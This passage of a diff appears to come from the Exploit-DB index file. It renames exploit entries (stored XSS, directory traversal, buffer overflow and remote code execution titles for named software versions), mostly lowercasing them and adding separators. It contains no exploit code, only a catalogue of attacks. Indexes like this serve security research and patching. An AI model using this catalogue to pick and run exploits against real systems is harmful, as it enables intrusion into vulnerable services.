XSS",2012-08-08,loneferret,windows,webapps,0 -20353,platforms/windows/webapps/20353.py,"MailTraq 2.17.3.3150 Stored XSS",2012-08-08,loneferret,windows,webapps,0 +20348,platforms/windows/webapps/20348.py,"axigen mail server 8.0.1 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 +20349,platforms/windows/webapps/20349.py,"emailarchitect enterprise email server 10.0 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 +20350,platforms/windows/webapps/20350.py,"escon supportportal pro 3.0 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 +20351,platforms/windows/webapps/20351.py,"mailenable enterprise 6.5 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 +20352,platforms/windows/webapps/20352.py,"afterlogic mailsuite pro (vmware appliance) 6.3 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 +20353,platforms/windows/webapps/20353.py,"mailtraq 2.17.3.3150 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 20354,platforms/php/remote/20354.rb,"PHP IRC Bot pbot eval() Remote Code Execution",2012-08-08,metasploit,php,remote,0 20355,platforms/windows/remote/20355.rb,"Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential",2012-08-08,metasploit,windows,remote,0 -20356,platforms/windows/webapps/20356.py,"ManageEngine Service Desk Plus 8.1 Stored XSS",2012-08-08,loneferret,windows,webapps,0 -20357,platforms/windows/webapps/20357.py,"Alt-N MDaemon Free 12.5.4 Stored XSS",2012-08-08,loneferret,windows,webapps,0 -20358,platforms/php/webapps/20358.py,"Wordpress Mini Mail Dashboard Widget 1.42 Stored XSS",2012-08-08,loneferret,php,webapps,0 -20359,platforms/windows/webapps/20359.py,"OTRS Open Technology Real Services 3.1.4 Stored XSS",2012-08-08,loneferret,windows,webapps,0 -20360,platforms/php/webapps/20360.py,"Wordpress Postie Plugin 1.4.3 Stored XSS",2012-08-08,loneferret,php,webapps,0 -20361,platforms/php/webapps/20361.py,"Wordpress SimpleMail Plugin 1.0.6 Stored XSS",2012-08-08,loneferret,php,webapps,0 -20362,platforms/windows/webapps/20362.py,"SmarterMail Free 9.2 Stored XSS",2012-08-08,loneferret,windows,webapps,0 -20363,platforms/windows/webapps/20363.py,"SurgeMail 6.0a4 Stored XSS",2012-08-08,loneferret,windows,webapps,0 -20364,platforms/php/webapps/20364.py,"T-dah Webmail Client 3.2.0-2.3 Stored XSS",2012-08-08,loneferret,php,webapps,0 -20365,platforms/php/webapps/20365.py,"Wordpress ThreeWP Email Reflector Plugin 1.13 Stored XSS",2012-08-08,loneferret,php,webapps,0 -20366,platforms/windows/webapps/20366.py,"WinWebMail Server 3.8.1.6 Stored XSS",2012-08-08,loneferret,windows,webapps,0 -20367,platforms/windows/webapps/20367.py,"Xeams Email Server 4.4 Build 5720 Stored XSS",2012-08-08,loneferret,windows,webapps,0 +20356,platforms/windows/webapps/20356.py,"manageengine service desk plus 8.1 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 +20357,platforms/windows/webapps/20357.py,"alt-n mdaemon free 12.5.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 +20358,platforms/php/webapps/20358.py,"wordpress mini mail dashboard widget 1.42 - Stored XSS",2012-08-08,loneferret,php,webapps,0 +20359,platforms/windows/webapps/20359.py,"otrs open technology real services 3.1.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 +20360,platforms/php/webapps/20360.py,"wordpress postie plugin 1.4.3 - Stored XSS",2012-08-08,loneferret,php,webapps,0 +20361,platforms/php/webapps/20361.py,"wordpress simplemail plugin 1.0.6 - Stored XSS",2012-08-08,loneferret,php,webapps,0 +20362,platforms/windows/webapps/20362.py,"smartermail free 9.2 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 +20363,platforms/windows/webapps/20363.py,"surgemail 6.0a4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 +20364,platforms/php/webapps/20364.py,"t-dah webmail client 3.2.0-2.3 - Stored XSS",2012-08-08,loneferret,php,webapps,0 +20365,platforms/php/webapps/20365.py,"Wordpress Plugin ThreeWP Email Reflector 1.13 - Stored XSS",2012-08-08,loneferret,php,webapps,0 +20366,platforms/windows/webapps/20366.py,"winwebmail server 3.8.1.6 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 +20367,platforms/windows/webapps/20367.py,"xeams email server 4.4 build 5720 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 20368,platforms/windows/webapps/20368.py,"IBM Proventia Network Mail Security System 2.5 POST File Read",2012-08-08,muts,windows,webapps,0 20369,platforms/hardware/remote/20369.sh,"Cisco PIX Firewall 5.2 PASV Mode FTP Internal Address Disclosure Vulnerability",2000-10-03,"Fabio Pietrosanti",hardware,remote,0 20370,platforms/cgi/remote/20370.txt,"Kootenay Web Inc whois 1.0 Remote Command Execution Vulnerability",2000-10-29,"Mark Stratman",cgi,remote,0 @@ -17781,7 +17779,7 @@ id,file,description,date,author,platform,type,port 20472,platforms/multiple/remote/20472.txt,"IBM DB2 Universal Database for Linux 6.1/Windows NT 6.1 Known Default Password Vulnerability",2000-12-05,benjurry,multiple,remote,0 20473,platforms/hardware/dos/20473.pl,"Cisco Catalyst 4000 4.x/5.x,Catalyst 5000 4.5/5.x,Catalyst 6000 5.x Memory Leak DoS",2000-12-06,blackangels,hardware,dos,0 20474,platforms/php/webapps/20474.txt,"WordPress RSVPMaker 2.5.4 - Persistent XSS",2012-08-13,"Chris Kellum",php,webapps,0 -20476,platforms/php/webapps/20476.txt,"Hotel Booking Portal v0.1 Multiple Vulnerabilities",2012-08-13,"Yakir Wizman",php,webapps,0 +20476,platforms/php/webapps/20476.txt,"Hotel Booking Portal 0.1 - Multiple Vulnerabilities",2012-08-13,"Yakir Wizman",php,webapps,0 20477,platforms/windows/webapps/20477.txt,"IBM WebSphere MQ File Transfer Edition Web Gateway CSRF Vulnerability",2012-08-13,"Nir Valtman",windows,webapps,0 20478,platforms/windows/webapps/20478.txt,"IBM WebSphere MQ File Transfer Edition Web Gateway Insufficient Access Control",2012-08-13,"Nir Valtman",windows,webapps,0 20479,platforms/linux/dos/20479.pl,"Pure-FTPd 1.0.21 (CentOS 6.2 & Ubuntu 8.04) - Crash PoC (Null Pointer Dereference)",2012-08-13,Kingcope,linux,dos,0 @@ -17793,7 +17791,7 @@ id,file,description,date,author,platform,type,port 20486,platforms/unix/remote/20486.html,"Matt Wright FormMail 1.x Cross-Site Request Forgery Vulnerability",1997-01-01,Anonymous,unix,remote,0 20487,platforms/hardware/dos/20487.pl,"Watchguard SOHO 2.2 Denial of Service Vulnerability",2000-12-08,"Filip Maertens",hardware,dos,0 20488,platforms/windows/remote/20488.txt,"MetaProducts Offline Explorer 1.x File System Disclosure Vulnerability",2000-12-07,Dodger,windows,remote,0 -20489,platforms/windows/remote/20489.txt,"Keware Technologies HomeSeer 1.4 Directory Traversal Vulnerability",2000-12-07,"SNS Research",windows,remote,0 +20489,platforms/windows/remote/20489.txt,"keware technologies homeseer 1.4 - Directory Traversal vulnerability",2000-12-07,"SNS Research",windows,remote,0 20490,platforms/unix/remote/20490.c,"BitchX IRC Client 1.0 c17 DNS Buffer Overflow Vulnerability",2000-12-04,nimrood,unix,remote,0 20491,platforms/multiple/remote/20491.txt,"KTH Kerberos 4 Arbitrary Proxy Usage Vulnerability",2000-12-08,"Jouko Pynnonen",multiple,remote,0 20492,platforms/unix/remote/20492.txt,"ssldump 0.9 b1 Format String Vulnerability",2000-12-11,c0ncept,unix,remote,0 @@ -17809,7 +17807,7 @@ id,file,description,date,author,platform,type,port 20504,platforms/cgi/remote/20504.html,"Leif M. Wright ad.cgi 1.0 Unchecked Input Vulnerability",2000-12-11,rpc,cgi,remote,0 20505,platforms/palm_os/local/20505.txt,"Secure Computing e.iD Authenticator for Palm 2.0 PIN Brute-Force Vulnerability",2000-12-14,@stake,palm_os,local,0 20506,platforms/cgi/remote/20506.html,"Leif M. Wright simplestguest.cgi 2.0 Remote Command Execution Vulnerability",2000-12-14,suid,cgi,remote,0 -20507,platforms/multiple/remote/20507.txt,"Alex Heiphetz Group EZShopper 2.0/3.0 Directory Traversal Vulnerability",2000-12-13,Nsfocus,multiple,remote,0 +20507,platforms/multiple/remote/20507.txt,"alex heiphetz group ezshopper 2.0/3.0 - Directory Traversal vulnerability",2000-12-13,Nsfocus,multiple,remote,0 20508,platforms/windows/dos/20508.txt,"Microsoft NT 4.0 RAS/PPTP Malformed Control Packet Denial of Service Attack",1999-04-27,"Simon Helson",windows,dos,0 20509,platforms/hardware/dos/20509.pl,"Cisco Catalyst 4000/5000/6000 6.1 SSH Protocol Mismatch Denial of Service",2000-12-13,blackangels,hardware,dos,0 20510,platforms/windows/remote/20510.txt,"AOL Instant Messenger 3.5.1856/4.0/4.1.2010/4.2.1193 'aim://' Buffer Overflow Vulnerability",2000-12-12,"Joe Testa",windows,remote,0 @@ -17846,8 +17844,8 @@ id,file,description,date,author,platform,type,port 20542,platforms/windows/local/20542.rb,"globalSCAPE CuteZIP Stack Buffer Overflow",2012-08-15,metasploit,windows,local,0 20543,platforms/windows/local/20543.rb,"Windows Service Trusted Path Privilege Escalation",2012-08-15,metasploit,windows,local,0 20544,platforms/php/webapps/20544.txt,"xt:Commerce <= 3.04 SP2.1 - Time Based Blind SQL Injection",2012-08-15,stoffline.com,php,webapps,0 -20545,platforms/windows/webapps/20545.txt,"Cyclope Employee Surveillance Solution 6.0 - Multiple Vulnerabilities",2012-08-15,loneferret,windows,webapps,0 -20546,platforms/php/webapps/20546.txt,"sphpforum 0.4 Multiple Vulnerabilities",2012-08-15,loneferret,php,webapps,0 +20545,platforms/windows/webapps/20545.txt,"Cyclope Employee Surveillance Solution 6.0 6.1.0 6.2.0 - Multiple Vulnerabilities",2012-08-15,loneferret,windows,webapps,0 +20546,platforms/php/webapps/20546.txt,"sphpforum 0.4 - Multiple Vulnerabilities",2012-08-15,loneferret,php,webapps,0 20547,platforms/windows/remote/20547.txt,"IE Time Element Memory Corruption Exploit (MS11-050)",2012-08-16,Ciph3r,windows,remote,0 20549,platforms/php/webapps/20549.py,"Roundcube Webmail 0.8.0 - Stored XSS",2012-08-16,"Shai rod",php,webapps,0 20550,platforms/php/webapps/20550.txt,"ProQuiz 2.0.2 - CSRF Vulnerability",2012-08-16,DaOne,php,webapps,0 @@ -17863,11 +17861,11 @@ id,file,description,date,author,platform,type,port 20560,platforms/unix/local/20560.c,"SSH 1.2.x Secure-RPC Weak Encrypted Authentication Vulnerability",2001-01-16,"Richard Silverman",unix,local,0 20561,platforms/linux/remote/20561.pl,"Dan Bernstein QMail 1.0 3 RCPT Denial of Service Vulnerability (1)",1997-06-12,"Frank DENIS",linux,remote,0 20562,platforms/linux/remote/20562.c,"Dan Bernstein QMail 1.0 3 RCPT Denial of Service Vulnerability (2)",1997-06-12,"Wietse Venema",linux,remote,0 -20563,platforms/unix/remote/20563.txt,"wu-ftpd 2.4.2/2.5 .0/2.6 .0/2.6.1/2.6.2 FTP Conversion Vulnerability",1999-12-20,suid,unix,remote,0 +20563,platforms/unix/remote/20563.txt,"wu-ftpd 2.4.2/2.5 .0/2.6 .0/2.6.1/2.6.2 - FTP Conversion Vulnerability",1999-12-20,suid,unix,remote,0 20564,platforms/windows/dos/20564.txt,"Microsoft Windows NT 4.0 SNMP-WINS DoS Vulnerability",1997-10-07,CRouland,windows,dos,0 20565,platforms/hardware/remote/20565.c,"HP JetDirect rev. G.08.x/rev. H.08.x/x.08.x/J3111A LCD Display Modification Vulnerability",1997-12-08,sili,hardware,remote,0 20566,platforms/linux/dos/20566.c,"Linux kernel 2.1.89/2.2.x Zero-Length Fragment Vulnerability",1997-12-08,"John McDonald",linux,dos,0 -20567,platforms/cgi/remote/20567.txt,"PHP PHP/FI 2.0 Directory Traversal Vulnerability",1997-04-16,Shamanski,cgi,remote,0 +20567,platforms/cgi/remote/20567.txt,"php php/fi 2.0 - Directory Traversal vulnerability",1997-04-16,Shamanski,cgi,remote,0 20568,platforms/sco/remote/20568.txt,"Skunkware 2.0 view-source Directory Traversal Vulnerability",1997-04-16,myst,sco,remote,0 20569,platforms/linux/remote/20569.c,"mICQ 0.4.6 Remote Buffer Overflow Vulnerability",2001-01-17,"tHE rECIdjVO",linux,remote,0 20570,platforms/cgi/remote/20570.txt,"Sambar Server 4.1 beta Admin Access Vulnerability",1998-06-10,"Michiel de Weerd",cgi,remote,0 @@ -17876,14 +17874,14 @@ id,file,description,date,author,platform,type,port 20574,platforms/php/webapps/20574.txt,"Social Engine 4.2.5 - Multiple Vulnerabilities",2012-08-17,Vulnerability-Lab,php,webapps,0 20575,platforms/windows/webapps/20575.txt,"ManageEngine OpStor 7.4 - Multiple Vulnerabilities",2012-08-17,Vulnerability-Lab,windows,webapps,0 20576,platforms/php/webapps/20576.txt,"Inferno vBShout <= 2.5.2 SQL Injection",2012-08-17,Luit,php,webapps,0 -20578,platforms/php/webapps/20578.pl,"Hastymail2 Webmail 1.1 RC2 Stored XSS",2012-08-17,"Shai rod",php,webapps,0 +20578,platforms/php/webapps/20578.pl,"hastymail2 webmail 1.1 rc2 - Stored XSS",2012-08-17,"Shai rod",php,webapps,0 20579,platforms/php/webapps/20579.py,"T-dah Webmail Multiple Stored XSS",2012-08-17,"Shai rod",php,webapps,0 -20580,platforms/php/webapps/20580.txt,"WeBid <= 1.0.4 Multiple Vulnerabilities",2012-08-17,dun,php,webapps,0 +20580,platforms/php/webapps/20580.txt,"webid <= 1.0.4 - Multiple Vulnerabilities",2012-08-17,dun,php,webapps,0 20581,platforms/linux/local/20581.c,"Mysql 3.22.x/3.23.x Local Buffer Overflow Vulnerability",2001-01-18,"Luis Miguel Silva",linux,local,0 20582,platforms/windows/remote/20582.c,"Icecast 1.3.7/1.3.8 print_client() Format String Vulnerability",2001-01-21,CyRaX,windows,remote,0 20583,platforms/cgi/remote/20583.pl,"textcounter.pl 1.2 Arbitrary Command Execution Vulnerability",1998-06-24,"Doru Petrescu",cgi,remote,0 -20584,platforms/windows/remote/20584.txt,"Fastream FTP++ 2.0 Directory Traversal Vulnerability",2001-01-22,"SNS Research",windows,remote,0 -20585,platforms/windows/local/20585.txt,"LocalWEB2000 1.1 Directory Traversal Vulnerability",2001-01-22,"SNS Research",windows,local,0 +20584,platforms/windows/remote/20584.txt,"fastream ftp++ 2.0 - Directory Traversal vulnerability",2001-01-22,"SNS Research",windows,remote,0 +20585,platforms/windows/local/20585.txt,"localweb2000 1.1 - Directory Traversal vulnerability",2001-01-22,"SNS Research",windows,local,0 20586,platforms/php/webapps/20586.txt,"Phorum 3.0.7 admin.php3 Unverified Administrative Password Change Vulnerability",2000-01-06,"Max Vision",php,webapps,0 20587,platforms/php/webapps/20587.txt,"Phorum 3.0.7 violation.php3 Arbitrary Email Relay Vulnerability",2000-01-01,"Max Vision",php,webapps,0 20588,platforms/php/webapps/20588.txt,"Phorum 3.0.7 auth.php3 Backdoor Vulnerabililty",2000-01-06,"Max Vision",php,webapps,0 @@ -17899,43 +17897,43 @@ id,file,description,date,author,platform,type,port 20598,platforms/php/webapps/20598.txt,"Jaow CMS 2.3 - Blind SQLi Vulnerability",2012-08-17,loneferret,php,webapps,0 20599,platforms/unix/remote/20599.sh,"Sendmail 8.6.9 IDENT Remote root Vulnerability",1994-02-24,CIAC,unix,remote,0 20600,platforms/windows/remote/20600.c,"SmartMax MailMax 1.0 SMTP Buffer Overflow Vulnerability",1999-02-13,_mcp_,windows,remote,0 -20601,platforms/multiple/remote/20601.txt,"iWeb Hyperseek 2000 Directory Traversal Vulnerability",2001-01-28,"MC GaN",multiple,remote,0 +20601,platforms/multiple/remote/20601.txt,"iweb hyperseek 2000 - Directory Traversal vulnerability",2001-01-28,"MC GaN",multiple,remote,0 20602,platforms/solaris/remote/20602.c,"Solaris x86 2.4/2.5 nlps_server Buffer Overflow Vulnerability",1998-04-01,"Last Stage of Delirium",solaris,remote,0 20603,platforms/solaris/local/20603.c,"Solaris 7/8 ximp40 Library Buffer Overflow Vulnerability",2001-01-31,UNYUN,solaris,local,0 20604,platforms/linux/local/20604.sh,"Debian 2.2,S.u.S.E 6.3/6.4/7.0 man -l Format String Vulnerability",2001-01-31,IhaQueR,linux,local,0 20605,platforms/windows/remote/20605.cpp,"Apple Quicktime plugin - Windows 4.1.2 (Japanese) Remote Overflow Vulnerability",2012-08-18,UNYUN,windows,remote,0 20606,platforms/cgi/remote/20606.pl,"qDecoder 4.x/5.x Remote Buffer Overflow Vulnerability",2000-03-26,"Jin Ho You",cgi,remote,0 -20607,platforms/windows/remote/20607.txt,"GoAhead WebServer 2.0/2.1 Directory Traversal Vulnerability",2001-02-02,"Sergey Nenashev",windows,remote,0 -20608,platforms/windows/remote/20608.txt,"Guido Frassetto SEDUM HTTP Server 2.0 Directory Traversal Vulnerability",2001-02-04,"Joe Testa",windows,remote,0 +20607,platforms/windows/remote/20607.txt,"goahead webserver 2.0/2.1 - Directory Traversal vulnerability",2001-02-02,"Sergey Nenashev",windows,remote,0 +20608,platforms/windows/remote/20608.txt,"guido frassetto sedum http server 2.0 - Directory Traversal vulnerability",2001-02-04,"Joe Testa",windows,remote,0 20609,platforms/cgi/remote/20609.txt,"Heat-On HSWeb Web Server 2.0 Path Disclosure Vulnerability",2001-02-04,"Joe Testa",cgi,remote,0 20610,platforms/multiple/dos/20610.txt,"Allaire JRun 3.0 Servlet DoS Vulnerability",2000-10-31,"Allaire Security",multiple,dos,0 -20611,platforms/cgi/remote/20611.txt,"Anaconda Foundation 1.4-1.9 Directory Traversal Vulnerability",2000-10-13,pestilence,cgi,remote,0 -20612,platforms/windows/remote/20612.txt,"Informs PicServer 1.0 Directory Traversal Vulnerability",2001-02-05,joetesta,windows,remote,0 +20611,platforms/cgi/remote/20611.txt,"anaconda foundation 1.4-1.9 - Directory Traversal vulnerability",2000-10-13,pestilence,cgi,remote,0 +20612,platforms/windows/remote/20612.txt,"informs picserver 1.0 - Directory Traversal vulnerability",2001-02-05,joetesta,windows,remote,0 20613,platforms/windows/dos/20613.txt,"Microsoft Windows 98/2000 UDP Socket DoS Vulnerability",2001-02-06,"Georgi Guninski",windows,dos,0 -20614,platforms/windows/remote/20614.txt,"AOLserver 3.2 Win32 Directory Traversal Vulnerability",2001-02-06,joetesta,windows,remote,0 +20614,platforms/windows/remote/20614.txt,"aolserver 3.2 win32 - Directory Traversal vulnerability",2001-02-06,joetesta,windows,remote,0 20615,platforms/unix/remote/20615.txt,"SSH 1.2.30 Daemon Logging Failure Vulnerability",2001-02-05,"Jose Nazario",unix,remote,0 -20616,platforms/windows/remote/20616.txt,"Soft Lite ServerWorx 3.0 Directory Traversal Vulnerability",2001-02-07,joetesta,windows,remote,0 +20616,platforms/windows/remote/20616.txt,"soft lite serverworx 3.0 - Directory Traversal vulnerability",2001-02-07,joetesta,windows,remote,0 20617,platforms/unix/remote/20617.c,"SSH 1.2.x CRC-32 Compensation Attack Detector Vulnerability",2001-02-08,"Michal Zalewski",unix,remote,0 20618,platforms/multiple/remote/20618.txt,"IBM Net.Commerce 2.0/3.x/4.x orderdspc.d2w order_rn Option SQL Injection",2001-02-05,"Rudi Carell",multiple,remote,0 20619,platforms/linux/remote/20619.c,"Linuxconf 1.1.6 r10 Remote Buffer Overflow Vulnerablity",1999-12-21,R00T-X,linux,remote,0 20620,platforms/sco/remote/20620.c,"SCO UNIX 5 calserver Remote Buffer Overflow Vulnerability",1998-12-29,"Leshka Zakharoff",sco,remote,0 20621,platforms/unix/local/20621.txt,"Micro Focus Cobol 4.1 Arbitrary Command Execution Vulnerability",2001-02-12,"Dixie Flatline",unix,local,0 20622,platforms/linux/remote/20622.c,"Xmail 0.5/0.6 CTRLServer Remote Arbitrary Commands Vulnerability",2001-02-01,isno,linux,remote,0 -20623,platforms/cgi/remote/20623.txt,"Carey Internets Services Commerce.cgi 2.0.1 Directory Traversal Vulnerability",2001-02-12,slipy,cgi,remote,0 +20623,platforms/cgi/remote/20623.txt,"carey internets services commerce.cgi 2.0.1 - Directory Traversal vulnerability",2001-02-12,slipy,cgi,remote,0 20624,platforms/windows/remote/20624.rb,"Adobe Flash Player 11.3 Font Parsing Code Execution",2012-08-20,metasploit,windows,remote,0 20625,platforms/multiple/remote/20625.txt,"SilverPlatter WebSPIRS 3.3.1 File Disclosure Vulnerability",2001-02-12,cuctema,multiple,remote,0 20626,platforms/linux/local/20626.c,"Linux sysctl() Kernel 2.2.x Memory Reading Vulnerability",2001-02-09,"Chris Evans",linux,local,0 20627,platforms/php/webapps/20627.py,"IlohaMail Webmail Stored XSS",2012-08-18,"Shai rod",php,webapps,0 -20628,platforms/windows/remote/20628.txt,"HIS Software Auktion 1.62 Directory Traversal Vulnerability",2001-02-12,cuctema,windows,remote,0 +20628,platforms/windows/remote/20628.txt,"his software auktion 1.62 - Directory Traversal vulnerability",2001-02-12,cuctema,windows,remote,0 20629,platforms/cgi/remote/20629.txt,"Way-Board 2.0 File Disclosure Vulnerability",2001-02-12,cuctema,cgi,remote,0 20630,platforms/cgi/remote/20630.txt,"Martin Hamilton ROADS 2.3 File Disclosure Vulnerability",2001-02-12,cuctema,cgi,remote,0 20631,platforms/cgi/remote/20631.txt,"PALS Library System WebPALS 1.0 pals-cgi Traversal Arbitrary File Read",2001-02-02,cuctema,cgi,remote,0 20632,platforms/cgi/remote/20632.txt,"PALS Library System WebPALS 1.0 pals-cgi Arbitrary Command Execution",2001-02-02,cuctema,cgi,remote,0 20633,platforms/cgi/remote/20633.txt,"Brightstation Muscat 1.0 Root Path Disclosure Vulnerability",2001-02-12,cuctema,cgi,remote,0 20634,platforms/windows/dos/20634.txt,"John Roy Pi3Web 1.0.1 Buffer Overflow Vulnerability",2001-02-15,joetesta,windows,dos,0 -20635,platforms/multiple/remote/20635.txt,"Caucho Technology Resin 1.2 Directory Traversal Vulnerability",2001-02-16,joetesta,multiple,remote,0 -20636,platforms/linux/remote/20636.txt,"Thinking Arts ES.One 1.0 Directory Traversal Vulnerability",2001-02-16,slipy,linux,remote,0 -20637,platforms/windows/remote/20637.txt,"ITAfrica WEBactive 1.0 Directory Traversal Vulnerability",2001-02-16,slipy,windows,remote,0 +20635,platforms/multiple/remote/20635.txt,"caucho technology resin 1.2 - Directory Traversal vulnerability",2001-02-16,joetesta,multiple,remote,0 +20636,platforms/linux/remote/20636.txt,"thinking arts es.one 1.0 - Directory Traversal vulnerability",2001-02-16,slipy,linux,remote,0 +20637,platforms/windows/remote/20637.txt,"itafrica webactive 1.0 - Directory Traversal vulnerability",2001-02-16,slipy,windows,remote,0 20638,platforms/multiple/remote/20638.txt,"Bajie Webserver 0.78/0.90 Remote Command Execution Vulnerability",2001-02-15,joetesta,multiple,remote,0 20639,platforms/multiple/remote/20639.txt,"Bajie 0.78 Arbitrary Shell Command Execution Vulnerability",2001-02-15,joetesta,multiple,remote,0 20640,platforms/windows/remote/20640.txt,"Working Resources BadBlue 1.2.7 Path Disclosure Vulnerability",2001-02-20,"SNS Research",windows,remote,0 @@ -17949,29 +17947,29 @@ id,file,description,date,author,platform,type,port 20648,platforms/solaris/remote/20648.c,"Solaris 2.6/7.0/8 snmpXdmid Buffer Overflow Vulnerability",2001-03-15,"Last Stage of Delirium",solaris,remote,0 20649,platforms/solaris/remote/20649.pm,"Solaris 2.6/7.0/8 snmpXdmid Buffer Overflow Vulnerability (msf)",2001-03-15,vlad902,solaris,remote,0 20650,platforms/windows/dos/20650.txt,"Sapio WebReflex 1.55 GET Denial Of Service Vulnerability",2001-02-27,slipy,windows,dos,0 -20651,platforms/windows/local/20651.txt,"Datawizards FtpXQ 2.0.93 Directory Traversal Vulnerability",2001-02-28,joetesta,windows,local,0 +20651,platforms/windows/local/20651.txt,"datawizards ftpxq 2.0.93 - Directory Traversal vulnerability",2001-02-28,joetesta,windows,local,0 20652,platforms/hardware/remote/20652.txt,"Cisco IOS 11.x/12.0 ILMI SNMP Community String Vulnerability",2001-02-27,pask,hardware,remote,0 20653,platforms/windows/remote/20653.txt,"SunFTP 1.0 Build 9 Unauthorized File Access Vulnerability",2001-03-02,se00020,windows,remote,0 20654,platforms/hardware/remote/20654.pl,"APC WEB/SNMP Management Card (9606) Firmware 3.0 Telnet Administration DoS",2001-02-26,altomo,hardware,remote,0 20655,platforms/windows/dos/20655.txt,"Orange Software Orange Web Server 2.1 DoS Vulnerability",2001-02-27,slipy,windows,dos,0 20656,platforms/windows/remote/20656.txt,"Robin Twombly A1 HTTP Server 1.0 Denial of Service Vulnerability",2001-02-27,slipy,windows,remote,0 -20657,platforms/windows/remote/20657.txt,"Robin Twombly A1 HTTP Server 1.0 Directory Traversal Vulnerability",2001-02-27,slipy,windows,remote,0 +20657,platforms/windows/remote/20657.txt,"robin twombly a1 http server 1.0 - Directory Traversal vulnerability",2001-02-27,slipy,windows,remote,0 20658,platforms/unix/local/20658.txt,"Joe Text Editor 2.8 .joerc Arbitrary Command Execution Vulnerability",2001-02-28,"Wkit Security",unix,local,0 20659,platforms/multiple/remote/20659.txt,"Netwin SurgeFTP 1.0 b Malformed Request Denial of Service Vulnerability",2001-03-01,"the Strumpf Noir Society",multiple,remote,0 20660,platforms/unix/remote/20660.txt,"KICQ 1.0 Remote Arbitrary Command Execution Vulnerability",2001-02-14,"Marc Roessler",unix,remote,0 -20661,platforms/windows/remote/20661.txt,"Jarle Aase War FTPD 1.67 b04 Directory Traversal Vulnerability",2001-03-06,se00020,windows,remote,0 +20661,platforms/windows/remote/20661.txt,"jarle aase war ftpd 1.67 b04 - Directory Traversal vulnerability",2001-03-06,se00020,windows,remote,0 20662,platforms/windows/dos/20662.txt,"WhitSoft SlimServe HTTPD 1.1 Get Denial of Service Vulnerability",2001-02-28,joetesta,windows,dos,0 -20663,platforms/windows/remote/20663.txt,"WhitSoft SlimServe FTPd 1.0/2.0 Directory Traversal Vulnerability",2001-02-28,joetesta,windows,remote,0 +20663,platforms/windows/remote/20663.txt,"whitsoft slimserve ftpd 1.0/2.0 - Directory Traversal vulnerability",2001-02-28,joetesta,windows,remote,0 20664,platforms/windows/dos/20664.pl,"Microsoft IIS 5.0 WebDAV Denial of Service Vulnerability",2001-03-08,"Georgi Guninski",windows,dos,0 20665,platforms/php/webapps/20665.txt,"T-dah Webmail CSRF & Stored XSS",2012-08-20,"Yakir Wizman",php,webapps,0 20666,platforms/php/webapps/20666.html,"ClipBucket 2.5 CSRF Vulnerability",2012-08-20,DaOne,php,webapps,0 20667,platforms/hardware/webapps/20667.txt,"Alpha Networks ADSL2/2+ Wireless Router ASL-26555 Password Disclosure",2012-08-20,"Alberto Ortega",hardware,webapps,0 -20668,platforms/java/webapps/20668.py,"Hupa Webmail 0.0.2 Stored XSS",2012-08-20,"Shai rod",java,webapps,0 +20668,platforms/java/webapps/20668.py,"hupa webmail 0.0.2 - Stored XSS",2012-08-20,"Shai rod",java,webapps,0 20669,platforms/php/webapps/20669.py,"GWebmail 0.7.3 XSS & LFI RCE Vulnerabilities",2012-08-20,"Shai rod",php,webapps,0 20671,platforms/php/webapps/20671.html,"PG Portal Pro CSRF Vulnerability",2012-08-20,Noxious,php,webapps,0 20672,platforms/php/webapps/20672.py,"Hivemail Webmail Multiple Stored XSS Vulnerabilities",2012-08-20,"Shai rod",php,webapps,0 20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 (index.php id parameter) SQL Injection",2012-08-20,DaOne,php,webapps,0 -20675,platforms/php/webapps/20675.py,"Uebimiau Webmail 2.7.2 Stored XSS",2012-08-20,"Shai rod",php,webapps,0 +20675,platforms/php/webapps/20675.py,"uebimiau webmail 2.7.2 - Stored XSS",2012-08-20,"Shai rod",php,webapps,0 20676,platforms/windows/remote/20676.rb,"Sysax Multi-Server 5.64 Create Folder Buffer Overflow",2012-08-20,"Matt Andreko",windows,remote,0 20677,platforms/windows/webapps/20677.txt,"IOServer ""Root Directory"" Trailing Backslash Multiple Vulnerabilities",2012-08-20,hinge,windows,webapps,0 20678,platforms/unix/local/20678.c,"Rob Malda ASCDC 0.3 Buffer Overflow Vulnerability (1)",2001-03-08,Anonymous,unix,local,0 @@ -17995,20 +17993,20 @@ id,file,description,date,author,platform,type,port 20696,platforms/windows/dos/20696.txt,"Alt-N MDaemon 3.5.6/5.0.7/6.x IMAP DoS Vulnerability",2001-03-23,nitr0s,windows,dos,0 20697,platforms/unix/local/20697.c,"DG/UX 4.20 lpsched Long Error Message Buffer Overflow Vulnerability",2001-03-19,"Luciano Rocha",unix,local,0 20702,platforms/windows/remote/20702.rb,"Sysax Multi Server 5.64 Create Folder Buffer Overflow",2012-08-21,metasploit,windows,remote,0 -20703,platforms/php/webapps/20703.txt,"XODA Document Management System v0.4.5 XSS & Arbitrary File Upload",2012-08-21,"Shai rod",php,webapps,0 +20703,platforms/php/webapps/20703.txt,"XODA Document Management System 0.4.5 - XSS & Arbitrary File Upload",2012-08-21,"Shai rod",php,webapps,0 20704,platforms/php/webapps/20704.txt,"Clipbucket 2.5 - Directory Traversal",2012-08-21,loneferret,php,webapps,0 -20705,platforms/multiple/dos/20705.py,"SAP Netweaver Dispatcher 7.0 EHP1/2 Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos,0 +20705,platforms/multiple/dos/20705.py,"sap netweaver dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos,0 20706,platforms/linux/webapps/20706.rb,"Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change (MSF)",2012-08-21,Kc57,linux,webapps,0 20707,platforms/linux/webapps/20707.py,"Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change",2012-08-21,Kc57,linux,webapps,0 20708,platforms/php/webapps/20708.txt,"Clipbucket 2.5 - Blind SQLi 